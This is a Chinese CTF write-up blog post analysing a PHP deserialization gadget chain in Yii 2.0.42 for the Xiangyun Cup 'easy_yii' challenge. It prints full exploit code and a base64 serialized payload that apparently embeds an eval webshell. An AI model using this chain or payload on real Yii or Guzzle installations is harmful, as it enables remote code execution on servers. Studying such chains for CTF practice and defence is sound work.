深入分析祥云杯easy_yii

最新推荐文章于 2021-12-13 09:54:42 发布
最新推荐文章于 2021-12-13 09:54:42 发布
阅读量344 收藏
点赞数 1
分类专栏: CTF writeup 文章标签: php web安全 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/119949258
版权
CTF 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
writeup
12 篇文章 0 订阅
订阅专栏

深入分析祥云杯easy_yii

题目描述

yii最新的链子

前置知识

析构函数__destruct

官方解释:析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行

<?php
class MyDestructableClass {
   function __construct() {
       print "In constructor\n";
       $this->name = "MyDestructableClass";
   }

   function __destruct() {
       print "Destroying " . $this->name . "\n";
   }
}

$obj = new MyDestructableClass();
?>

在这里插入图片描述
在这里插入图片描述
销毁对象或者变量这个东西PHP是如下定义显示销毁和隐示销毁的:
显示销毁:当对象没有被引用时就会被销毁,所以我们可以unset或为其赋值NULL;
隐示销毁:PHP是脚本语言,在代码执行完最后一行时,所有申请的内存都要释放掉。

和构造函数 __construct一样,父类的析构函数不会被引擎暗中调用。要执行父类的析构函数,必须在子类的析构函数体中显式调用 parent::__destruct()。此外也和构造函数一样,子类如果自己没有定义析构函数则会继承父类的。

题目复现

yii 2.0.42 最新反序列化利用

全局搜索__destruct

在这里插入图片描述
其他yii链利用都存在__wakeup 方法,直接抛出异常导致无法利用,

会遍历 $this->processes,那么这里的 $process 就可控,全局搜索 __call方法。
在这里插入图片描述

根据上图中已给出的漏洞利用链分析可知,$ this->generator可控,那么就可以调用任意类的方法,但KaTeX parse error: Expected group after '_' at position 24: …的,所以此处仅仅可以再次触发 _̲_call,但是注意do-wh…res就OK了,找其他的__call方法。

在DefaultGenerator.php中
在这里插入图片描述
这里返回内容完全可控,也就意味着$res也已经OK了
在这里插入图片描述

思路逐渐清晰

链子:
RunProcess入口 --> DefaultGenerator __call–>AppendStream–>CachingStream -->PumpStream call_user_func方法

在这里找到了利用的地方,中间参数和变量的控制根据exp可进行分析:

<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('K3vin');
        }
    }
    echo urlencode(serialize(new RunProcess()));
}

namespace Faker{
    class DefaultGenerator
{
    protected $default;

    public function __construct($default = null)
    {
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){phpinfo();};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}

反序列化后的结果:
在这里插入图片描述
得到如下:

TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjI6e3M6OToiACoAb3V0cHV0IjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjU6ImppYW5nIjt9czo0MzoiAENvZGVjZXB0aW9uXEV4dGVuc2lvblxSdW5Qcm9jZXNzAHByb2Nlc3NlcyI7YToxOntpOjA7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7TzoyODoiR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbSI6Mjp7czozNzoiAEd1enpsZUh0dHBcUHNyN1xBcHBlbmRTdHJlYW0Ac3RyZWFtcyI7YToxOntpOjA7TzoyOToiR3V6emxlSHR0cFxQc3I3XENhY2hpbmdTdHJlYW0iOjI6e3M6NDM6IgBHdXp6bGVIdHRwXFBzcjdcQ2FjaGluZ1N0cmVhbQByZW1vdGVTdHJlYW0iO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO2I6MDt9czo2OiJzdHJlYW0iO086MjY6Ikd1enpsZUh0dHBcUHNyN1xQdW1wU3RyZWFtIjozOntzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0Ac291cmNlIjtDOjMyOiJPcGlzXENsb3N1cmVcU2VyaWFsaXphYmxlQ2xvc3VyZSI6MTg0OnthOjU6e3M6MzoidXNlIjthOjA6e31zOjg6ImZ1bmN0aW9uIjtzOjI5OiJmdW5jdGlvbigpe2V2YWwoJF9HRVRbJ2EnXSk7fSI7czo1OiJzY29wZSI7czoyNjoiR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0iO3M6NDoidGhpcyI7TjtzOjQ6InNlbGYiO3M6MzI6IjAwMDAwMDAwMzIyMWZjMmEwMDAwMDAwMDBlNjc3MjcyIjt9fXM6MzI6IgBHdXp6bGVIdHRwXFBzcjdcUHVtcFN0cmVhbQBzaXplIjtpOi0xMDtzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0AYnVmZmVyIjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjE6ImoiO319fX1zOjM4OiIAR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzZWVrYWJsZSI7YjoxO319fX0=

POST方式传数据即可拿flag

最后附上自动代码审计结果:
在这里插入图片描述

题目源码:

链接:https://pan.baidu.com/s/1QBdlRWhZ55h0VyB07DF3UQ
提取码:9i4i

参考文章

https://xz.aliyun.com/t/9948

https://zhuanlan.zhihu.com/p/403202397

sash1mi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4302
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
regauth_my_yii
07-13
regauth_my_yii Yii 框架的基本功能是从头开始实现的,作为测试任务的一部分。 框架的以下功能已经实现: 模型类 验证模型中的数据 使用数据库 使用配置 语言班 与用户合作 6.1 注册 6.2 登录 7. 支持命名空间 8. ...
祥云2021 ezyii反序列化pop链分析
Mrs_H的博客
08-26 441
前言 前几天刚看完祥云的题目,做了这道ezyii。当时直接就找到了原本链子的exp直接就拿来用了,没有过多的思考。然而打完这道题目之后,发现后面的题都不太会了(菜狗状。额,那就把这道题的链子好好分析一下吧。 声明:本文的exp及思路来源于这里 POP链分析 在做这道题的时候,根据特征来进行判断,可以看出是上述文章中的第四条链子。下面是我对这个链子的分析过程。 链子的触发点是__destruct()函数也就是下面这个类 这里调用了stopProcess()函数,那么自然而然地想到__call(),找到__
YII链子学习反序列化
liubi32326的博客
10-14 719
YII反序列化链子学习思路: 入门学习反序列化的不二选择就是去yii框架中找链子。这也我是总结其他大佬挖的链子做的简单的、略为清晰一点复现尝试 第一条:CVE-2020-15148(0day) 思路: 首先肯定根据一个反序列化的点构造一条链。目前来说,只有__destruct和__wakeup这两个魔术方法可以使用 魔术方法__destruct,在对象被销毁前被调用。从系统结构的角度讲,其最常见的场景是关闭某些功能。比如关闭文件流,更新数据等。但从反序列化的角度讲,其特殊的使用场景,代表在这个方法内可能会调
[祥云2021:Wp]
qq_42906381的博客
08-24 306
MISC新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语
2021祥云
qq_48511129的博客
12-13 1044
安全检测 尝试用admin/admin登录,发现成功登录 输入一个百度的地址,发现跳转到了百度。 于是尝试能不能跳转到本地http://127.0.0.1发现无法跳转 网站很多都有一个admin后台目录,接着尝试能不能跳转到该目录 发现成功跳转 看到include123.php文件,于是接着跳转到该文件下面 发现了一些php代码 发现对get传的参数过滤了很多东西。本地文件包含,远程文件包含命令执行等基本都过滤了。 暑假做题的时候做到了一道类似的题,把这些都过滤了,他用的方法是用session文件包含,因为
yii-1.1.0.r1700.zip_yii_yii1.0 model结构
09-24
`yii-1.1.0.r1700.zip` 是Yii 1.1版本的一个特定修订版,`yii_yii1.0 model结构` 提示我们这次的重点是探讨模型(Model)的架构。 在Yii框架中,MVC(Model-View-Controller)设计模式是核心组成部分。模型(Model...
yii-1.1.4.r2429.zip_mvc php_php yii_yii 1.1.4.rar_yii mvc_yii1.1
09-22
"yii-1.1.4.r2429" 和 "yii_1.1.4.rar" 文件很可能是这个版本的框架源码或安装包,方便开发者下载和使用。 "MVC_php" 和 "yii_mvc" 标签表明了该资源与 MVC 设计模式在 PHP 环境下的应用密切相关,特别是通过 Yii ...
Yii 2.0 权威指南-10142017.pdf.tar.gz_Yii2.0_yes_yii框架
09-23
"Yii 2.0 权威指南" 是一本深入探讨该框架的权威参考资料,帮助开发者充分利用其强大功能。 Yii 2.0 的核心特性包括: 1. **高性能**:Yii 使用了优化的代码和缓存策略,如页面片段缓存、数据缓存和自定义缓存解决...
yii-1.0.10.r1472.zip_scaffolding_scale_yii 1.0 downlo
09-24
Yii -- a high-performance component-based PHP framework best for developing large-scale Web applications. Yii comes ... Written in strict OOP, Yii is easy to use and is extremely flexible and extensible.
Yii2框架与项目
bujidexinq的专栏
05-25 1518
第一部分:需求 第二部分:初始Yii2 2.1结构 2.2生命周期 上半部分创建了一个应用主体,应用主体明确了由哪个控制器去接管后面的工作。 第1步,发出url后,apache会执行index.php这个文件,在Yii框架中,这个文件叫入口文件。 这个文件在web目录下,执行此文件件主要做2件事: 1. 读取配置文件web.php 2. 配置文件的数据来实例化这个应用主体。 应用主体...
祥云题解
蚁景网安学院
08-25 2158
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 # bad_cat战队WRITEUP 一、 战队信息 战队名称:bad_cat 战队排名:6 二、 解题情况 三、 解题过程 web **1、**ezyii 网上搜yii的1day https://xz.aliyun.com/t/9948#toc-6 思路类似于第四条链子 exp: <?p.
2020祥云网络安全大赛 MISC Writeup
末初的CSDN博客
11-23 5069
文章目录签到进制反转到点了xixixi带音乐家 签到 PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZ3txcV9ncm91cF84MjY1NjYwNDB9'));" string(24) "flag{qq_group_826566040}" 进制反转 题目描述: 电脑中到底使用的是什么进制呢?真是麻烦,有时候还是手机好用。结果用flag{}包住,并且全为大写 WinRAR打开显示文件头损坏,其次有加密,猜测RA
yii漏洞-2.0.41链子复现
giaogiao123的博客
08-25 454
一环境配置 1.环境 yii-2.0.41版本 2. vscode+xdebug手动调试 3. php环境7.1 下载源码修改/config/web.php文件17行cookieValidationKey,随便设一个数目,然后,解压,到那个目录下php yii serve 启动(需要配置php环境变量) 访问 http//:localhost:8080 自己写一个反序列化入口 在controllers目录下创建一个TestController: <?php namespace app\contr
第二届“祥云”网络安全大赛暨吉林省第四届大学生网络安全大赛 WriteUp 2021年祥云misc
mumuzi的博客
08-23 4293
层层取证 层层套娃取证(确信) 给了一个内存和一个虚拟磁盘的取证,先看磁盘,取证大师打开提示存在bitlocker加密 用Passware Kit Forensic 2021 v1 (64-bit)能直接梭出来bitlocker的秘钥 方法是把001解压出来,然后把2.ntfs放进去,再选择有内存镜像,导入这道题的内存镜像,然后等待…… 当然之后也发现内存中也可以找到,但是已经不重要 得到549714-116633-006446-278597-176000-708532-618101-131406 解开发
2020羊城CTF随缘Writeup
sash1mi
01-09 3499
2020羊城CTF随缘Writeup docker源码链接: https://github.com/k3vin-3/YCBCTF2020 Web部分 a_piece_of_java 考点:源码审计、java反序列化 PS:这道题没整明白,直接给出官方WP 第一步,serialkiller 白名单过滤,构造动态代理触发 JDBC 连接: DatabaseInfo databaseInfo = new DatabaseInfo(); databaseInfo.setHost("x.x.x.x"); datab
一道CTF题ezinclude引出的蚁剑新姿势
sash1mi
12-11 3329
[NPUCTF2020]ezinclude 0x01 初探题目 查看页面源码 fuzz一波 出来一个dir.php 看看dir.php,关于数组的东西 先留着 说不定下面有用 抓包看看index.php有甚么 一个Hash还是蛮醒目的 结合刚才的页面信息username&password 尝试去拼接url /?name=1&pass=576322dd496b99d07b5b0f7fa7934a25(所给的Hash) 拿到一个flflflflag.php 访问 跳转到了404.h
LDAP注入攻击
sash1mi
06-28 3230
LDAP注入攻击 什么是LDAP? LDAP(Lightweight Directory Access Protocol)轻量级目录访问协议,是一种在线目录访问协议,主要用于目录中资源的搜索和查询,是X.500的一种简便的实现。 ------“X.500是构成全球分布式的名录服务系统的协议。X.500组织起来的数据就象一个很全的电话号码簿,或者说一个X.500系统象是一个分门别类的图书馆。而某一机构建立和维护的名录数据库只是全球名录数据库的一部分。特点:分散维护,强大的搜索性能。” 换句话说LDAP是用于访
CSICTF2020随缘Writeup
sash1mi
02-06 3190
CSICTF2020随缘Writeup 国外的一个CTF比赛,题目难度适中,这里附上源码及下载地址 https://github.com/k3vin-3/CSICTF2020 Web Cascade 考点:CSS文件 按F12直接在Network中查看CSS文件,拿到flag csictf{w3lc0me_t0_csictf} CCC 考点:jwt、文件包含 在右侧菜单栏中Our Admins和Login不能直接点开,但是通过源代码可以看到链接了两个地址:/adminNames和/login,访问/a
YII_CSRF_TOKEN
最新发布
04-05
Yii框架中,YII_CSRF_TOKEN是用于防止跨站请求伪造(CSRF)攻击的令牌。CSRF攻击是一种利用用户已经登录的身份进行恶意操作的攻击方式。通过在每个表单中添加一个隐藏字段YII_CSRF_TOKEN,并在后台验证该令牌的有效性,可以有效地防止CSRF攻击。 在Yii框架中,有两种方式可以获取YII_CSRF_TOKEN令牌: 1. 自动获取YII_CSRF_TOKEN令牌[^1]: 在主配置文件中进行简单的配置,启用Yii的CSRF验证功能。在components中的request配置中,将enableCsrfValidation设置为true。这样,在每个表单提交时,Yii框架会自动添加一个隐藏字段YII_CSRF_TOKEN,并验证该令牌的有效性。 2. 手动获取YII_CSRF_TOKEN令牌: 如果你自己编写的表单没有使用Yii的表单助手(Form Helper),你需要手动添加一个隐藏字段YII_CSRF_TOKEN。你可以使用Yii的getRequest()方法获取YII_CSRF_TOKEN的值,并将其作为隐藏字段的值。 下面是一个手动添加隐藏字段YII_CSRF_TOKEN的例子: ```php <input type="hidden" value="<?php echo Yii::app()->getRequest()->getCsrfToken(); ?>" name="YII_CSRF_TOKEN" /> ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值